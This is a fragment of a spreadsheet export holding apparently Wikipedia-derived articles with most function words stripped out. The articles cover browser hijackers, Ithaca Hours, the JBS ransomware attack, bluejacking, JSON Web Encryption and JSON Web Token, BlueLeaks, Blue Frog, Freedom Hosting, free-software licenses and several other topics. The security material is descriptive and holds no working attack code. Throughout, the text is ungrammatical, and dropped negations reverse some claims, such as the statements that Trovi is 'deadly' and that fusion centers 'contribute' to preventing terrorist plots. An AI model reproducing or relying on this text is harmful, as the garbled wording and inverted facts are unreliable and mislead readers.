process re-installs re-enables every time affected user removes browser(s). snap.do disable option change homepage default search engine. resoft track following information: internet domain address user accesses resoft products (location, etc.) screen resolution user's computer monitor (display) date time user intentionally unintentionally accesses resoft products pages user visiting resoft products (with without knowledge using resoft products, snap.do) user willingly unwillingly linked resoft website another referring website, address siteby using resoft products, user consents personal data transferred processed within outside united states america. using resoft website, user agrees preceding uses information resoft. sourceforge installer previous installer sourceforge included adware installers.one particular changes browser settings firefox, chrome internet explorer show website "istartsurf.com" homepage. changing registry settings installing software resets settings user tries change them. june 2015, sourceforge claimed stopped coupling "third party offers" unmaintained sourceforge projects. vosteran vosteran browser hijacker changes browser's home page default search provider vosteran.com. this infection essentially bundled third-party applications. identity vosteran protected privacyprotect.org australia. vosteran registered whiteknight. trovi found installing "cheat engine" different version "vlc player" www.oldapps.com, downloading applications certain freeware sites, softonic.com download.com. trovi uses bing legitimate search engine) provide results user. although address changes bing.com showing search results, search keywords executed trovi anyway. trovi formerly used website show search results logo left hand corner page later switched bing attempt fool users easily. trovi deadly taking search results depending browser used, still considered browser hijacker. also controls homepage page settings prohibit ability change back original settings. depending whatever browser used, appear page. when infects, makes browser redirect google search engines trovi.com.trovi created using conduit toolbar creation service known infect similar ways conduit toolbar. references</t>
  </si>
  <si>
    <t>Ithaca Hours</t>
  </si>
  <si>
    <t>ithaca hour local currency formerly used ithaca, york longest-running local currency systems, though longer circulation. inspired similar systems madison, wisconsin; santa barbara, california; corvallis, oregon; proposed system lehigh valley, pennsylvania. ithaca hour valued us$10 generally recommended used payment hour's work, although rate negotiable. currency ithaca hours backed national currency cannot freely converted national currency, although businesses agree them. hours printed high-quality paper faint graphics would difficult reproduce, bill stamped serial number, discourage counterfeiting.in 2002, one-tenth hour bill introduced, partly encouragement funding alternatives federal credit union feedback retailers complained awkwardness larger denominations work; bills bear signatures hours president steve burke president afcu.although ithaca hour notes found, recent years fallen disuse several reasons. first, founder system, paul glover, moved area. while ithaca, glover acted evangelist networker hours, helping spread helping businesses find ways spend hours received. secondly, hours declined result general shift away cash transactions towards electronic transfers debit credit cards. glover emphasized every local currency needs least full-time networker "promote, facilitate troubleshoot" currency circulation. origin ithaca hours started paul glover november 1991. system historical roots scrip alternative local currencies proliferated america great depression.while research local economics 1989, glover seen "hour" note issued 19th century british industrialist robert owen workers spending company store. after ithaca hours began, glover discovered owen's hours based josiah warren's "time store" notes 1827. 1991, local student patrice jennings interviewed glover ithaca lets enterprise. this conversation strongly reinforced interest trade systems. jennings's research ithaca lets failure integral development hour currency; conversations jennings glover helped ensure hours used knowledge worked lets system.within days, glover designs hour half hour notes. established hour would worth equivalent $10, average hourly amount workers earned surrounding tompkins county, although exact rate exchange given transaction decided parties themselves. greenstar cooperative market, local food co-op, glover approached gary fine, local massage therapist, photocopied samples. fine became first person sign list formally agreeing accept hours exchange services. soon after, rohrrsen, proprietor local store, became first retailer sign-up accept ithaca hours exchange merchandise. when system first started, people agreed accept hours services. they agreed accept hours despite lack business plan guarantee. glover began small donations help printing hours. fine line printing completed first 1,500 hours 1,500 half hours october 1991. these notes, first modern local currency, nearly twice large later printings ithaca hours. because well people's wallets, almost original notes removed circulation. first issue ithaca money printed press, printing shop chenango bridge, york, october 1991. next glover issued hours ithaca hours, organization founded system, first four reimbursements cost printing hours. that, october 1991, hours disbursed prepared mailing first pioneers. october 1991, glover bought samosa catherine martinez farmers' market half hour #751—the first hour. several market vendors enrolled day. during next years thousand individuals enrolled accept hours, plus businesses. stacks ithaca money newspaper distributed town invitation "join fun." barter potluck held giac november 1991, first many monthly gatherings food skills exchanged, acquaintances made, friendships renewed. management philosophy 1996, glover running ithaca hours system home, system advisory board governing board called "barter potluck". board glover forth idea economic interactions based harmony rather hobbesian forms competition. interview, glover stated "there's growing movement called "ecological economics" ithaca hours part cosmos. last year wrote article discusses moving toward provision food, fuel, clothing, housing, transportation, [and other] necessities ways healing nature, less depleting least bring people together basis shared pride, arrogance." thus underlying principle local currency movement create "fair trade" minimum conflict exploitation either people natural resources.the advisory board incorporated ithaca hour system ithaca hours, inc. october 1998, hosted first elections board directors march 1999. first board directors included monica hargraves, cogan, margaret mccasland, erica etten, greg spence wolf, leroy, legrace benson, wally woods, jennifer elges, donald stephenson. 1999 glover turned administration ithaca hours newly elected board directors. glover continued support ithaca hours community outreach present, notably ithaca health fund (now incorporated part ithaca health alliance) ithaca community news. current board directors, 2014-2015, includes erik lehmann (chair), danielle klock, leroy. economic development several million dollars value hours traded since 1991 among thousands residents area businesses, including cayuga medical center, alternatives federal credit union, public library, many local farmers, movie theatres, restaurants, healers, plumbers, carpenters, electricians, landlords. primary functions ithaca hours system promote local economic development. businesses receive hours must spend local goods services, thus building network inter-supporting local businesses. while non-local businesses welcome accept hours, businesses need spend local goods services economically sustainable. mission promote local economic development, board directors also makes interest-free loans ithaca hours local businesses grants local non-profit organizations. also local currency list community currencies united states labour voucher time-based currency wörgl, silvio gesell references external links official ithaca hours website paul glover's website schumacher society local currency website brief history local currencies community currency online magazine</t>
  </si>
  <si>
    <t>JBS S.A. cyberattack</t>
  </si>
  <si>
    <t>2021, s.a., brazil-based meat processing company, suffered cyberattack, disabling beef pork slaughterhouses. attack impacted facilities united states, canada, australia. background s.a., brazil-based meat processing company, supplies approximately one-fifth meat globally, making world's largest producer beef, chicken, pork sales. attack compared colonial pipeline cyberattack, occurred earlier month.an employee recorded future referred attack largest date impact company focused food production. some forty additional attacks food producers occurred twelve months preceding attack, targets including beverage company molson coors. impact facilities belonging usa, jbs' american subsidiary, including focused pork poultry, faced disruption attack. jbs-owned beef facilities united states rendered temporarily inoperative. impacted slaughterhouses located states including utah, texas, wisconsin, nebraska. notable shutdown beef facility souderton, pennsylvania, largest facility east chicago, according jbs.the beef industry australia faced disruption result attack. "stood down" 7000 australian employees june 2.the u.s. department agriculture unable offer wholesale beef pork prices june predicted shortfalls meat production price increases, usda encouraged companies increase production. indicated june facilities would resume functioning june attack heightened awareness consolidation meatpacking industry united states, corresponding vulnerability decreased production, four major meat producers reduce output.jbs paid hackers million ransom. ransom paid bitcoin. american politician carolyn maloney criticized company paying ransom concerns might incentivize attacks. attack brought attention potentially negative consequences consolidation meat production. responsibility white house announced cyberattack likely conducted russian organization, news outlets reported revil culpable. june revil taken credit attack, conducting investigation origins. after july 2021 phone call united states president biden russian president vladimir putin, biden told press, made clear united states expects ransomware operation coming soil even though it’s sponsored state, expect give enough information is." biden later added united states would take group's servers putin not.on july 2021, revil websites infrastructure vanished internet. references</t>
  </si>
  <si>
    <t>Bluejacking</t>
  </si>
  <si>
    <t>bluejacking sending unsolicited messages bluetooth bluetooth-enabled devices mobile phones, pdas laptop computers, sending vcard typically contains message name field (i.e., bluedating bluechat) another bluetooth-enabled device obex protocol. bluetooth limited range, usually around metres (32.8 mobile phones, laptops reach metres (328 powerful (class transmitters. origins bluejacking reportedly first carried 2001 2003 malaysian consultant used phone advertise ericsson single nokia 7650 phone owner malaysian bank. also invented name, claims amalgam bluetooth ajack, username esato, sony ericsson online forum. jacking however, extremely common shortening "hijack', taking something. ajack's original posts hard find, references exploit common 2003 posts. another user forum claims earlier discovery, reporting near-identical story attributed ajack, except describe bluejacking nokia 7650 phones instead one, location garage, seemingly denmark, rather malaysian bank. also, message insult nokia owners rather sony ericsson advertisement. usage bluejacking usually harmful issue arises consider bluejacked people generally know happened, think phone malfunctioning. usually, bluejacker send text message, modern phones possible send images sounds well. bluejacking used guerrilla marketing campaigns promote advergames. bluejacking also confused bluesnarfing, mobile phones illegally hacked bluetooth. companies bluejackq bluejackq website dedicated bluejacking. website contains bluejacking stories taken site's forum. website also includes software used bluejacking guides bluejack slightly date basic principle still applies makes phone. forum 4,000 registered users 93,050 posts. website featured many news articles.the forums opened november 2003 center bluejackq start. currently moderators different sections available members. areas included information bluejackq, reviews mobile phones, media players, pdas miscellaneous devices, general bluejacking threads off-topic area. bluejackq podcast first released test version january 2006, thus becoming first bluejacking-related podcast. podcasts featured three members forums. fictional reference person interest authentic bluejacking described exploit frequently depicted television series person interest; fictional exploit portrayed different invasive capabilities. also bluebugging bluesnarfing airdrop references</t>
  </si>
  <si>
    <t>JSON Web Encryption</t>
  </si>
  <si>
    <t>json encryption (jwe) ietf standard providing standardised syntax exchange encrypted data, based json base64. defined 7516. along json signature (jws), possible formats (json token). forms part javascript object signing encryption (jose) suite protocols. vulnerabilities march 2017, serious flaw discovered many popular implementations jwe, invalid curve attack.one implementation early (pre-finalised) version also suffered bleichenbacher’s attack. references</t>
  </si>
  <si>
    <t>BlueLeaks</t>
  </si>
  <si>
    <t>blueleaks, sometimes referred twitter hashtag #blueleaks, refers 269.21 gibibytes internal u.s. enforcement data obtained hacker collective anonymous released june 2020, activist group distributed denial secrets, called "largest published hack american enforcement agencies".the data internal intelligence, bulletins, emails, reports produced august 1996 june 2020 enforcement agencies, provided fusion centers. obtained security breach netsential, developer works fusion centers enforcement. leaks released hunter.ddosecrets.com announced @ddosecrets twitter account. account banned shortly "dissemination hacked materials" "information could individuals risk real-world harm." wired reported distributed denial secrets attempted remove sensitive information data publication. national fusion center association (nfca) officials confirmed authenticity data, according documents obtained security journalist brian krebs; organization warned members hackers leaked information target them. background blue leaks data comes largely intelligence gathered fusion centers. after september 2001 terrorist attacks, united states government sought improve communication different levels enforcement better discover prevent terrorist attacks. they encouraged state local governments create fusion centers: physical locations representatives different enforcement agencies share collectively analyze intelligence distributing reports back respective agencies. fusion centers since begun working private "data brokers" little public oversight.fusion centers criticized privacy-invading, ineffective, targeted political groups. 2012, senate permanent subcommittee investigations found months review, fusion centers contribute identification prevention terrorist plot,: unclassified fusion center reports reviewed, three-quarters connection terrorism all.: 2008, department homeland security identified number privacy-related concerns created fusion centers. department noted excessive secrecy fusion centers comparisons cointelpro, fusion center reports sometimes distribute inaccurate incomplete information.: 28–9 2012 senate report points report issued illinois fusion center 2011. report wrongly claimed russian hackers blame broken water pump, despite department homeland security publicly stating report false, office intelligence analysis included claims report congress.after murder george floyd instances police violence 2020, enforcement united states came renewed scrutiny. early june, hacker collective anonymous announced intent expose police misconduct. collective high-profile hacks 2000s early 2010s. 2011, antisec, subgroup anonymous, released enforcement information support occupy wall street protestors, collective significant operations within united states since then. findings blueleaks collection includes internal memos, financial records, state, local, federal agencies. more million documents leaked enforcement fusion centers. leaked documents, officers track individual, group, event pages protest anti-law enforcement rhetoric. some documents contain material related attitudes enforcement response black lives matter movement, george floyd protests, covid-19 pandemic. during george floyd protests, enforcement agencies monitored protesters' communications social media messaging apps. reports leaked found police aware potential surveillance violate constitution. they distributed documents police filled rumors warnings protests would become violent, sparking fear among police officers.the documents also show much broader trend surveillance. they show details data police obtain social media sites including facebook, twitter, tiktok, reddit tumblr, among others. fusion centers also collect distribute detailed data automatic license plate readers.surveys enforcement training programs reveal instructors prejudiced unprofessional. classes taught biased, outdated, incorrect content. some contain sexual content unrelated class, report instructor admitting lying court frequently.in maine, legislators took interest blueleaks thanks details maine information analysis center, investigation. leaks showed fusion center spying keeping records people legally protesting "suspicious" committed crime.documents also contain reports countries department homeland security, u.s. department state agencies. officials discussed cyber attacks iran concerns attacks early 2020. another report discusses possible chinese espionage natural facilities. homeland security also discussed russian interference american elections, attempts hack 2020 census, manipulation social media discussion. google's cybercrime investigation group august guardian revealed, based leaked documents, existence google's "cybercrime investigation group" (cig). group focused voluntarily forwarding detailed information google, youtube, gmail users, among products, members northern california regional intelligence, counter-terrorist fusion center, content threatening violence otherwise expressing extremist views, often associated right. company also said report users appeared mental distress, indicating suicidal thoughts intent commit self-harm.one google identified users order report enforcement cross-referencing different gmail accounts, eventually single android phone. cases, company users reported authorities, said still accounts youtube, gmail, services. response shortly leaks released, june twitter permanently banned ddosecrets's twitter account distributing hacked materials. twitter also censored links ddosecrets website.german authorities seized server used ddosecrets request u.s. authorities. server hosted blueleaks files, documents remained available download bittorrent websites.reddit banned r/blueleaks, community created discuss blueleaks, claiming posted personal information.there federal investigation relating blueleaks. various freedom information requests filed blueleaks ddosecrets rejected ongoing federal investigation. homeland security investigations questioned least person, seeking information blueleaks, ddosecrets, founders, emma best.the editor intercept described blueleaks enforcement equivalent pentagon papers. also afghan documents leak cyberwarfare electronic civil disobedience hacktivism computer hacking political reasons. jeremy hammond hacktivist also leaked information relating enforcement. iraq documents leak panama papers paradise papers references</t>
  </si>
  <si>
    <t>JSON Web Token</t>
  </si>
  <si>
    <t>json token (jwt, pronounced word "jot") proposed internet standard creating data optional signature and/or optional encryption whose payload holds json asserts number claims. tokens signed either using private secret public/private key. example, server could generate token claim "logged administrator" provide client. client could token prove logged admin. tokens signed party's private (usually server's) party subsequently verify token legitimate. party, suitable trustworthy means, possession corresponding public key, able verify token's legitimacy. tokens designed compact, url-safe, usable especially web-browser single-sign-on (sso) context. claims typically used pass identity authenticated users identity provider service provider, type claims required business processes.jwt relies json-based standards: json signature json encryption. structure header identifies algorithm used generate signature hs256 indicates token signed using hmac-sha256. typical cryptographic algorithms used hmac sha-256 (hs256) signature sha-256 (rs256). (json algorithms) 7518 introduces many authentication encryption. payload contains claims. specification defines seven registered claim names standard fields commonly included tokens. custom claims usually also included, depending purpose token. this example standard issued time claim (iat) custom claim (loggedinas). signature securely validates token. signature calculated encoding header payload using base64url encoding 4648 concatenating together period separator. that string cryptographic algorithm specified header, case hmac-sha256. base64url encoding similar base64, uses different non-alphanumeric characters omits padding. three parts encoded separately using base64url encoding 4648, concatenated using periods produce jwt: data secret "secretkey" creates token: eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyjsb2dnzwrjbkfzijoiywrtaw4ilcjpyxqioje0mji3nzk2mzh9.gzsrasys8exbxln_ownfsrgczcmjmmjliuyu5cspyhi this resulting token easily passed html http. authentication, user successfully logs using credentials, json token returned must saved locally (typically local session storage, cookies also used), instead traditional approach creating session server returning cookie. unattended processes client also authenticate directly generating signing pre-shared secret pass oauth compliant service like so:if client passes valid assertion server generate access_token valid making calls application pass back client:when client wants access protected route resource, user agent send jwt, typically authorization http header using bearer schema. content header might look like following: authorization: bearer eyjhbgci...&lt;snip&gt;...yu5cspyhi this stateless authentication mechanism user state never saved server memory. server's protected routes check valid authorization header, present, user allowed access protected resources. jwts self-contained, necessary information there, reducing need query database multiple times. standard fields implementations implementations exist many languages frameworks, including limited vulnerabilities json tokens contain session state. project requirements allow session invalidation expiration, services longer trust token assertions token alone. validate session stored token revoked, token assertions must checked data store. this renders tokens longer stateless, undermining primary advantage jwts.security consultant mclean reported vulnerabilities libraries used field incorrectly validate tokens, commonly accepting alg=none token. while vulnerabilities patched, mclean suggested deprecating field altogether prevent similar implementation confusion. still, alg=none vulnerabilities still found wild, four cves filed 2018-2021 period cause.with proper design, developers address algorithm vulnerabilities taking precautions: never header alone drive verification know algorithms (avoid depending field alone) appropriate size also access token basic access authentication digest access authentication http header references 7519 jwt.io specialized website tools documentation, maintained auth0</t>
  </si>
  <si>
    <t>JUpdater</t>
  </si>
  <si>
    <t>jupdater project aims create utility allows developers quickly implement version checks java programs. utility ensures user always notified versions, easily upgrade latest version within program, without anything. utility downloads files date, saving bandwidth. jupdater split parts. small java client, easily implemented existing programs, server part, keeps track versions provides client info requires. project still development, possibly containing bugs. program updated jupdater contained file. client small bundle classes, jupdater client, added programs compare versions central server. client requires greater. client provides three main operations. update specified file comparing files' checksums, done several steps described below. check version available server using implementation-version attribute manifest. check version available corresponding changelog using implementation-version attribute.an interface optionally implemented order listen update process. this information instance displayed user. server jupdater requires central server contains information latest version. clients connect server order check versions download changes changelog. server requires greater mysql greater. updating works here's depth description actually happens behind scenes performing complete update check. jupdater instance's updatejar method called name file update relevant program name. client opens connection server sends program name (via http post). server establishes session responds session server's program. from point client server session server therefore remembers program client wants update requests connected specific update. client stores server's response sends request file list server's file xml-rpc. server responds list (taken server's database). client calculates checksums local files find (looking file list server), rest given checksum client sends result server (via xml-rpc). server checks checksums entries database returns list files checksums match (i.e. list files date). following array sent back file date: [filename, size, correct md5] (all things read database). nothing date client stops here, otherwise continues. client requests changelog server (via xml-rpc). server responds changes entered administrator) made client's versions latest version. client displays changes asks listener shouldstartdownloading() download files. false returned method client stops here, otherwise continues. client starts downloading date files temporary storage. file client calculates checksum make sure matches, otherwise tries (until tries). client begins patch date files downloaded. copies current jar's date files file writes downloaded files jar. once done without errors replaces date jar, hence completing update. also stableupdate external links jupdater readme readme application.</t>
  </si>
  <si>
    <t>Blue Frog</t>
  </si>
  <si>
    <t>blue frog freely-licensed anti-spam tool produced blue security inc. operated part community-based system tried persuade spammers remove community members' addresses mailing lists automating complaint process user spam received. blue security maintained addresses hashed form intrude registry, spammers could free tools clean lists. tool discontinued 2006. information community members reported spam blue security, analyzed make sure guidelines, reported sites sending illegal spam isps hosted could contacted willing work them), anti-spam groups law-enforcement authorities attempt spammer cease desist. measures failed, blue security sent back instructions blue frog client. client software used instructions visit leave complaints websites advertised spam messages. spam message user received, blue frog client would leave generic complaint, including instructions remove blue security users future mailings. blue security operated assumption community grew, flow complaints tens hundreds thousands computers would apply enough pressure spammers clients convince stop spamming members blue security community. blue frog software included firefox internet explorer plugin allowing gmail, hotmail, yahoo! mail e-mail users report spam automatically. users could also report spam desktop email applications microsoft office outlook, outlook express mozilla thunderbird. users downloaded free blue frog software registered e-mail addresses intrude" registry. each user could protect addresses personal domain name. blue frog available free add-on within firetrust mailwasher anti-spam filter. also compatible spamcop, tool different spam-fighting methods. blue security released software products (including blue frog) open-source: developer community could review, modify, enhance them. spammers' backlash 2006, blue frog members started receive intimidating e-mail messages sources claiming software actually collecting personal details identity theft, ddos attacks, creating spam database, purposes. blue security contested claims.one variant e-mailed message stated spammers found extract addresses database malicious purposes. blue security software works, possible; however, spammers identify bluefrog member e-mail addresses lists already possess. blue security provides spammers free tool allows "clean lists". extracting addresses directly program would impossible hashes, spammer list bluesecurity filter compare results unaltered list, thus identify bluesecurity users target them. this method identify blue frog addresses already spammer's possession, cannot give access as-yet-untargeted addresses. controversy 2006, blue security company subject retaliatory ddos attack initiated spammers. servers folded load, blue security redirected entries point company weblog, announcing difficulty. company weblog hosted blogs.com webportal, subsidiary apart. this effectively redirected attack blogs.com caused apart's server farm collapse, turn said made 2,000 blogs unreachable several hours. individuals claiming members computer security establishment condemned blue security company action took ddos attack. representative renesys likened action pushing burning couch house neighbor's.in defense, blue security inc. stated aware ddos attack made change, claiming "blackholed" isolated) israeli network result social engineering hack, alleged pulled attackers high-tier isp's tech support staff. this claim disputed many writers todd underwood, writer renesys blog. most sources, however, agree regardless whether blue security "blackholed", seem facing attack time redirected address. blue security also claimed remained amicable terms apart pointed fact blog hosting company blame even name press release explained service outage. event, action widely reported security websites, possibly damaging blue security's reputation within community. time, incident broad reporting general-interest media considered many boon notoriety blue security blue frog project. security expert brian krebs gives different reason blue security's website unavailable article washington post. says happened blue security lying unable receive http requests (because servers down), saying "black hole filtered" maliciously re-directed traffic, rather actually unable receive traffic attack servers. this makes probable essentially telling truth eran reshef simply misinformed users unable reach site. accusations malware some users accused blue frog malware mozilla's chat forums, claiming blue frog spammed signatures yahoo! gmail accounts, left active remnants operating system uninstalling, hinted actual reason blue frog's existence accumulating "do-not-spam" database harvest fresh addresses spammers deluge. blue frog shut week forum thread appeared.after blue security recast collactive, would accused spamming. attackers identified soon attack started, blue security eran reshef claimed identified attacker pharmamaster, quoted writing "blue found right solution stop spam, can't continue" conversation blue security. prime suspects distributed denial service (ddos) attack blue security's servers identified rokso database christopher brown, swank "dollar" partner joshua burch "zmack". unidentified australians "some russians" (russian/americans), notably kuvayev alex blood, also involved. suspects identified transcript postings special forum spam attacks ddos attack planned. shutdown service blue security ceased operation 2006. company announced look non-spam related uses technology. company's investors expressed full support company's decision change business plan.many users suggested continuing project's goals decentralized manner (specifically using peer-to-peer technology, client distributed bittorrent similar, thus making spam processing client distribution elements harder spammers attack). program purportedly begun name okopipi though appears abandoned. number users recommended users uninstall blue frog program, longer useful without blue security servers active. complainterator former blue security members, dwarf, wrote program called complainterator. runs windows add-on several popular email clients. processes spam emails produces email messages sent sites hosting spamvertised products. goal inform hosting sites hopes remove spam sites, thereby making difficult spammers profit spam activities. also anti-spam techniques (e-mail) collactive, founded blue security team. malware references bibliography krebs, brian (may 2006), "blue security kicked while it's down", washington post, archived original june 2006 spammers victory implications. singel, ryan (may 2006), "under attack, spam fighter folds", wired news. underwood, todd (may 2006), "the blue security fiasco", renesys, archived original june 2006. external links berinato, scott (november 2006), "attack bots. latest threat net: autonomous software programs combine forces perpetrate mayhem, fraud, espionage global scale. company fought internet mafia lost", wired, vol. botnets ddos attack blue frog, 2006. brand, madeleine; reshef, eran 2006), "spammers win, anti-spam software firm shuts down", (transcript) (interview), npr. montan, eric, spammer desperately tries undermine blue security. krebs, brian (may 2006), fight against spam email, goliath wins again", washington post. ranum, marcus "enabling complaint department", ranum (editorial). knujon another anti-spam service, multi-tiered response internet threats, specifically email-based threats" suspects ddos attack</t>
  </si>
  <si>
    <t>JXplorer</t>
  </si>
  <si>
    <t>jxplorer free, open-source client browsing lightweight directory access protocol (ldap) servers ldap data interchange format (ldif) files. released apache-equivalent license. jxplorer written java platform independent, configurable, translated number languages. total, 2018, jxplorer downloaded million times sourceforge bundled several linux distributions. several common linux distributions include jxplorer software ldap server administration. software also runs bsd-variants, aix, hp-ux, solaris, windows (2000, z/os. features are: ssl, sasl gssapi dsml ldif localisation (currently available german, french, japanese, traditional chinese, simplified chinese, hungarian); optional ldap filter constructor gui; extensible architecturethe primary authors maintainers chris betts trudi ersvaer, originally working (then computer associates) etrust directory (now directory) software melbourne, australia. version 3.3, '10th anniversary edition' released july 2012. also list ldap software references external links official website jxplorer sourceforge</t>
  </si>
  <si>
    <t>Blur (browser extension)</t>
  </si>
  <si>
    <t>blur, formerly donottrackme (dntme), browser extension blocking trackers internet developed abine, privacy company headquartered boston, massachusetts first released firefox march, 2011. there free paid version features. donottrackme available mozilla firefox, google chrome, safari, internet explorer browsers. october, 2013, abine reported could develop dntme smartphones tablets technology limitations, working mobile products. version v34.3.1263 current october, 2014. add-on designed stop abine claims companies tracking users across internet. favorably reviewed business insider cnet. donottrackme stops companies blocking internet tracking activity, abine defines request webpage tries make browser perform share information intended record, profile, share online activity." these trackers place companies like facebook google analytics track internet users, tracking provides benefits companies, better tailoring advertisements users. articles donottrackme published magazine, forbes, wall street journal, cnn. february 2013 company claimed 1,500,000 downloads.an associated add-on, maskme, provided deletable, masked email addresses without charge, masked telephone numbers credit cards subscription charge. these masked contact details enable organization contact user redirecting communications, without revealing actual destination.in november 2014, abine announced blur replacement donottrackme maskme services, free paid options. also ublock origin disconnect mobile open source application developed brian kennish casey oppenheim designed stop non-consensual third party trackers. ghostery privacy security-related browser extension mobile application owned ghostery, inc. privacy badger free browser extension created blocks advertisements tracking cookies. references external links official website</t>
  </si>
  <si>
    <t>Lego Life</t>
  </si>
  <si>
    <t>lego life name social media magazine, produced lego group. development launch according lego, idea lego life originated monitoring children shared lego builds lego club magazine's "cool creations" section posted creations company’s message boards. lego life developed transfer desire share creations online environment.the released android january 2017. initially launched united kingdom, united states america, canada, france, germany, denmark, austria switzerland. usage lego life aims offer online version physical lego product. company named crisp conducts content moderation uploaded images published site. offer in-app purchases, however lego present within parental consent obtained, unlocks features commenting free text instead emoticons offered default.lego life used approximately million children around world, across countries. reception safe.becausefamily.org praised concepts challenges presented children, criticised merchandising advertising aspect app. similarly, common sense media praised child safety functions within also noted "there's escape commercial nature experience". magazine lego life magazine quarterly publication promotes lego products. aimed children ages five nine. launched 2017 replacement lego club magazine, produced hard copy digital versions. awards nominations also lego group lego lego club magazine references</t>
  </si>
  <si>
    <t>Freedom Hosting</t>
  </si>
  <si>
    <t>this defunct hosting site related freedom hosting ltd, operating australia.freedom hosting defunct specialist hosting service established 2008. height august 2013, largest host. anonymous denial-of-service attack 2011, anonymous launched operation darknet, anti-child pornography effort activities dark web. largest sites, lolita city, hosted freedom hosting, denial-of-service attacked (ddos), later member list leaked following injection attack, hidden wiki linked federal investigation news reports linked firefox browser vulnerability united states federal bureau investigation (fbi) operation targeting freedom hosting's owner, eric eoin marques. august 2013, discovered firefox browsers many older versions browser bundle vulnerable javascript attack, noscript enabled default. this attack exploited send users' addresses windows computer names attackers. acknowledged responsible attack september 2013 court filing dublin; technical details training presentation leaked edward snowden showed codename exploit egotisticalgiraffe.marques arrested ireland august 2013, provisional extradition warrant issued united states court 29th july year. sought extradite marques maryland four charges distributing, conspiring distribute, advertising child pornography well aiding abetting advertising child pornography. warrant alleges marques "the largest facilitator child porn planet". attorneys fought several years prevent extradition united states grounds asperger syndrome, would receive appropriate care prison, extradited. december 2016, irish court appeal ruled extradition proceed. this appeal process, however, lawyers announced would make appeal supreme court. this appeal dismissed irish supreme court march 2019. marques faced life prison tried convicted united states. february 2020, marques pleaded guilty count conspiracy advertise child abuse images, part plea agreement would entail prison term years. september 2021, marques sentenced years imprisonment ordered forfeit $154,000. notable hosted sites hackbb lolita city mail hidden wiki proceeding site since freedom hosting closed, organization, freedom hosting created, running percent dark sites. references</t>
  </si>
  <si>
    <t>Free software license</t>
  </si>
  <si>
    <t>free-software license notice grants recipient piece software extensive rights modify redistribute software. these actions usually prohibited copyright law, rights-holder (usually author) piece software remove restrictions accompanying software software license grants recipient rights. software using license free software free open-source software) conferred copyright holder. free-software licenses applied software source code also binary object-code form, copyright recognizes forms. comparison free-software licenses provide risk mitigation different legal threats behaviors seen potentially harmful developers: history pre-1980s early times software, sharing software source code common certain communities, instance academic institutions. before commission technological uses copyrighted works (contu) decided 1974 "computer programs, extent embody author's original creation, proper subject matter copyright", software considered copyrightable. therefore, software licenses attached shared public-domain software. contu decision plus court decisions apple franklin 1983 object code, clarified copyright gave computer programs copyright status literary works started licensing software. free-software licenses late 1980s generally informal notices written developers themselves. these early licenses "permissive" kind. 1980s mid-1980s, project produced copyleft free-software licenses software packages. early license (the "gnu emacs copying permission notice") used emacs 1985, revised "gnu emacs general public license" late 1985, clarified march 1987 february 1988. likewise, similar general public license applied compiler collection, initially published 1987. original license also first free-software licenses, dating 1988. 1989, version general public license (gpl) published. version gpl, released 1991, went become widely used free-software license. 1990s 2000s starting mid-1990s mid-2000s, open-source movement pushed focused free-software idea forward wider public business perception. dot-com bubble time, netscape communications' step release webbrowser foss license 1998, inspired many companies adapt foss ecosystem. trend companies projects (mozilla, apache foundation, sun, also list) wrote foss licenses, adapted existing licenses. this license proliferation later recognized problem free open-source ecosystem increased complexity license compatibility considerations. while creation licenses slowed later, license proliferation impact considered ongoing serious challenge free open-source ecosystem. from free-software licenses, version tested court, first germany 2004 later usa. german case judge explicitly discuss validity gpl's clauses accepted adhered agreed upon parties, defendant would notwithstanding lack necessary rights copy, distribute, make software 'netfilter/iptables' publicly available." because defendant comply gpl, cease software. case (mysql progress) settled verdict arrived initial hearing, judge saris "saw reason" would enforceable.around 2004 lawyer lawrence rosen argued essay public domain license software could truly waived public domain can't interpreted permissive foss license, position faced opposition daniel bernstein others. 2012 dispute finally resolved rosen accepted open source license, admitting contrary previous claims copyright waived away, backed ninth circuit decisions.in 2007, years draft discussion, gplv3 major update gplv2 released. release controversial significant extended scope license, made incompatible gplv2. several major foss projects (linux kernel, mysql, busybox, blender, media player) decided adopting gplv3. hand, 2009, years release gplv3, google open-source programs office manager chris dibona reported number open-source projects licensed software moved gplv3 gplv2 50%, counting projects hosted google code. 2010s 2011, four years release gplv3, 6.5% open-source licensed projects gplv3 42.5% still gplv2 according black duck software data. following 2011 group analyst matthew aslett argued blog post copyleft licenses went decline permissive licenses increased, based statistics black duck software.in 2015 according black duck software github statistics, permissive license dethroned gplv2 popular free-software license second place permissive apache license follows already third place. june 2016 analysis fedora project's packages revealed used licenses gpl, mit, bsd, lgpl. definitions osi-approved open-source licenses group open source initiative (osi) defines maintains list approved open-source licenses. agrees widely used free-software licenses, differ fsf's list, approves open source definition rather free software definition. considers free software permissive license group reference implementation free software license. thus requirements approving licenses different. fsf-approved free-software licenses free software foundation, group maintains free software definition, maintains non-exhaustive list free-software licences.the free software foundation prefers copyleft (share-alike) free-software licensing rather permissive free-software licensing purposes. list distinguishes free-software licenses compatible incompatible fsf's copyleft general public license. conditions free-software licenses there exists ongoing debate within free-software community regarding fine line restrictions applied still called "free".only "public-domain software" software public-domain-like license restriction-free. examples public-domain-like licenses are, instance, wtfpl license. permissive licenses might carry small obligations like attribution author allow practically code cases. certain licenses, namely copyleft licenses, include intentionally stronger restrictions (especially distribution/distributor) order force derived projects guarantee specific rights can't taken away. copyleft free-software share-alike licenses written richard stallman mid-1980s pioneered concept known "copyleft". ensuing copyleft provisions stated modified versions free software distributed, must distributed terms original software. hence referred "share share alike" "quid quo". this results software open source well. since copyleft ensures later generations software grant freedom modify code, "free software". non-copyleft licenses ensure later generations software remain free. developers code product must make source code available anyone share sell object code. case, source code must also contain changes developers made. code used shared sold, code required made available changes remain private. this permits developers organizations modify code private purposes (that code project sold otherwise shared) without required make changes available public. supporters claim mandating derivative works remain gpl, fosters growth free software requires equal participation users. opponents claim license guarantee future software availability" disadvantages outweigh advantages. some also argue restricting distribution makes license less free. whereas proponents would argue preserving freedom distribution would make less free. example, non-copyleft license grant author freedom modified versions work gets publicly published, whereas copyleft license grant freedom. patent retaliation during 1990s, free-software licenses began including clauses, patent retaliation, order protect software patent litigation cases problem previously existed. this threat reasons writing version 2006. recent years, term coined tivoization describes process hardware restrictions used prevent users running modified versions software hardware, tivo device example. viewed turn free software effectively non-free, chosen prohibit gplv3. most newly written free-software licenses since late 1990s include form patent retaliation clauses. these measures stipulate one's rights license (such redistribution), terminated attempts enforce patents relating licensed software, certain circumstances. example, apple public source license terminate user's rights said user embarks litigation proceedings patent litigation. patent retaliation emerged response proliferation abuse software patents. hardware 